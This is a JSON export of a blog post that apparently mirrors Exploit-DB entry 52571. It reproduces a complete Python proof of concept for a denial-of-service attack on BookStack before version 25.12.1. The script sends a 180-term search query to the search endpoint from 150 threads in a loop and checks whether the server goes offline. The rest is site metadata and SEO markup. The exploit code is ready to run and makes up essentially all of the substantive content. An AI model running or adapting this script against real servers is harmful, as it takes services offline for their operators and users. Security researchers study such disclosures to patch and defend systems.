{"id":56068,"date":"2026-05-21T08:31:47","date_gmt":"2026-05-21T08:31:47","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=56068"},"modified":"2026-05-21T08:31:47","modified_gmt":"2026-05-21T08:31:47","slug":"bookstack-25121-denial-of-service","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=56068","title":{"rendered":"BookStack 25.12.1 &#8211; Denial of Service_EDB-ID:52571"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-21T13:27:56&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: BookStack 25.12.1 &#8211; Denial of Service Search Terms Resource Exhaustion Date: 2026-04-29 Exploit Author: Gabriel Rodrigues TEXUGO Vendor Homepage: https:\/\/www.bookstackapp.com Software Link: https:\/\/github.com\/BookStackApp\/BookStack&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-21T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-21T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;BookStack 25.12.1 &#8211; Denial of Service&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;EDB-ID:52571&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;# Exploit Title: BookStack 25.12.1 &#8211; Denial of Service \\r\\nSearch Terms (Resource Exhaustion)\\r\\n# Date: 2026-04-29\\r\\n# Exploit Author: Gabriel Rodrigues (TEXUGO)\\r\\n# Vendor Homepage: https:\/\/www.bookstackapp.com\\r\\n# Software Link: https:\/\/github.com\/BookStackApp\/BookStack\\r\\n# Version: \\u003c 25.12.1\\r\\n# Tested on: BookStack v25.12 (Docker) + PHP 8.3 + MySQL 8.0\\r\\n# CVE: Pending (Request ID: 1970573)\\r\\n# References:\\r\\n# https:\/\/www.bookstackapp.com\/blog\/bookstack-release-v25-12-1\/\\r\\n# https:\/\/github.com\/BookStackApp\/BookStack\/security\/advisories (if any)\\r\\n\\r\\n\\&#8221;\\&#8221;\\&#8221;\\r\\nBookStack DoS PoC\\r\\npython3 poc_dos_search.py http:\/\/localhost:8080 [cookie]\\r\\n\\&#8221;\\&#8221;\\&#8221;\\r\\n\\r\\nimport requests, sys, time\\r\\nfrom urllib.parse import quote\\r\\nfrom concurrent.futures import ThreadPoolExecutor\\r\\n\\r\\n# Payload: 100 termos + 50 exatos + 30 tags = 180 termos de busca\\r\\n# Gera query SQL com muitos OR LIKE, full table scans e subqueries\\r\\nPAYLOAD = \\&#8221; \\&#8221;.join([f\\&#8221;t{i}\\&#8221; for i in range(100)] + [f&#8217;\\&#8221;e{i}\\&#8221;&#8216; for i in range(50)] + [f\\&#8221;[t{i}=v{i}]\\&#8221; for i in range(30)])\\r\\nstop = False\\r\\n\\r\\ndef attack(url, headers):\\r\\n    s = requests.Session()\\r\\n    while not stop:\\r\\n        try:\\r\\n            s.get(url, headers=headers, timeout=30)\\r\\n        except:\\r\\n            pass\\r\\n\\r\\ndef main():\\r\\n    global stop\\r\\n    url = sys.argv[1].rstrip(\\&#8221;\/\\&#8221;)\\r\\n    cookie = sys.argv[2] if len(sys.argv) \\u003e 2 else None\\r\\n    search_url = f\\&#8221;{url}\/search?term={quote(PAYLOAD)}\\&#8221;\\r\\n    headers = {\\&#8221;Cookie\\&#8221;: cookie} if cookie else {}\\r\\n    \\r\\n    print(f\\&#8221;[*] Query: {PAYLOAD[:80]}&#8230;\\&#8221;)\\r\\n    print(f\\&#8221;[*] URL completa tem {len(search_url)} bytes\\&#8221;)\\r\\n    print(f\\&#8221;[*] Atacando {url} com 150 threads por 30s\\\\n\\&#8221;)\\r\\n    \\r\\n    with ThreadPoolExecutor(150) as ex:\\r\\n        [ex.submit(attack, search_url, headers) for _ in range(150)]\\r\\n        \\r\\n        for i in range(15):\\r\\n            time.sleep(2)\\r\\n            try:\\r\\n                r = requests.get(url, timeout=3)\\r\\n                print(f\\&#8221;[{(i+1)*2:2d}s] ONLINE &#8211; {r.status_code}\\&#8221;)\\r\\n            except requests.exceptions.Timeout:\\r\\n                print(f\\&#8221;[{(i+1)*2:2d}s] OFFLINE &#8211; TIMEOUT\\&#8221;)\\r\\n            except:\\r\\n                print(f\\&#8221;[{(i+1)*2:2d}s] OFFLINE &#8211; CONNECTION ERROR\\&#8221;)\\r\\n        \\r\\n        stop = True\\r\\n\\r\\nif __name__ == \\&#8221;__main__\\&#8221;:\\r\\n    main()&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/www.exploit-db.com\/raw\/52571&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.exploit-db.com\/exploits\/52571&#8243;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-21T13:27:56&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: BookStack 25.12.1 &#8211; Denial of Service Search Terms Resource Exhaustion Date: 2026-04-29 Exploit Author: Gabriel Rodrigues TEXUGO Vendor Homepage: https:\/\/www.bookstackapp.com Software Link: https:\/\/github.com\/BookStackApp\/BookStack&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-21T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-21T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;BookStack&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,40,13,33,7,11,5],"class_list":["post-56068","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-exploitdb","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>BookStack 25.12.1 - Denial of Service_EDB-ID:52571 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=56068\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"BookStack 25.12.1 - Denial of Service_EDB-ID:52571 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-05-21T13:27:56&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: BookStack 25.12.1 &#8211; Denial of Service Search Terms Resource Exhaustion Date: 2026-04-29 Exploit Author: Gabriel Rodrigues TEXUGO Vendor Homepage: https:\/\/www.bookstackapp.com Software Link: https:\/\/github.com\/BookStackApp\/BookStack&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-21T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-21T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;BookStack...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=56068\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-21T08:31:47+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56068#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56068\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"BookStack 25.12.1 &#8211; Denial of Service_EDB-ID:52571\",\"datePublished\":\"2026-05-21T08:31:47+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56068\"},\"wordCount\":521,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"exploitdb\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=56068#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56068\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56068\",\"name\":\"BookStack 25.12.1 - Denial of Service_EDB-ID:52571 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-21T08:31:47+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56068#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=56068\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=56068#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"BookStack 25.12.1 &#8211; Denial of Service_EDB-ID:52571\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"BookStack 25.12.1 - Denial of Service_EDB-ID:52571 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=56068","og_locale":"en_US","og_type":"article","og_title":"BookStack 25.12.1 - Denial of Service_EDB-ID:52571 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-05-21T13:27:56&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: BookStack 25.12.1 &#8211; Denial of Service Search Terms Resource Exhaustion Date: 2026-04-29 Exploit Author: Gabriel Rodrigues TEXUGO Vendor Homepage: https:\/\/www.bookstackapp.com Software Link: https:\/\/github.com\/BookStackApp\/BookStack&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-21T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-21T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;BookStack...","og_url":"https:\/\/zero.redgem.net\/?p=56068","og_site_name":"zero redgem","article_published_time":"2026-05-21T08:31:47+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=56068#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=56068"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"BookStack 25.12.1 &#8211; Denial of Service_EDB-ID:52571","datePublished":"2026-05-21T08:31:47+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=56068"},"wordCount":521,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","exploitdb","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=56068#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=56068","url":"https:\/\/zero.redgem.net\/?p=56068","name":"BookStack 25.12.1 - Denial of Service_EDB-ID:52571 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-21T08:31:47+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=56068#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=56068"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=56068#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"BookStack 25.12.1 &#8211; Denial of Service_EDB-ID:52571"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/56068","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=56068"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/56068\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=56068"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=56068"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=56068"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}